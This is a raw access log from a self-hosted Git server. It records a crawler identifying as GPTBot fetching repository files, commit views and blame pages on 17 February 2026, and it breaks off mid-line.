- GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 23483] [Gzip 19.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" [Client 74.7.227.38] [Length 16631] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:14:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" [Client 74.7.227.38] [Length 13813] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:14:53:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" [Client 74.7.227.38] [Length 21411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:14:53:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:53:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2fasset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 23185] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:14:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9858] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__" +[17/Feb/2026:14:53:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__" +[17/Feb/2026:14:53:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:14:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues/new" +[17/Feb/2026:14:53:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7795] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/projects" +[17/Feb/2026:14:53:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 3599833] [Gzip 11.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:54:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:14:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10464] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 11753] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode" +[17/Feb/2026:14:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" [Client 74.7.227.38] [Length 9924] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/keys.json" +[17/Feb/2026:14:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176796] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" +[17/Feb/2026:14:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176798] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" +[17/Feb/2026:14:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13492] [Gzip 5.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 11404] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:14:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10861] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10208] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10957] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10988] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153411] [Gzip 15.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.vscode/launch.json" +[17/Feb/2026:14:54:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.vscode/launch.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.vscode/launch.json" +[17/Feb/2026:14:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659890] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659892] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10197] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 10198] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 10967] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 885] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.vscode/launch.json" [Client 74.7.227.38] [Length 452] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.vscode/launch.json" +[17/Feb/2026:14:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" +[17/Feb/2026:14:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10990] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10863] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fREADME.md" [Client 74.7.227.38] [Length 23571] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/README.md" +[17/Feb/2026:14:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2f.venv%2fbin" [Client 74.7.227.38] [Length 19392] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 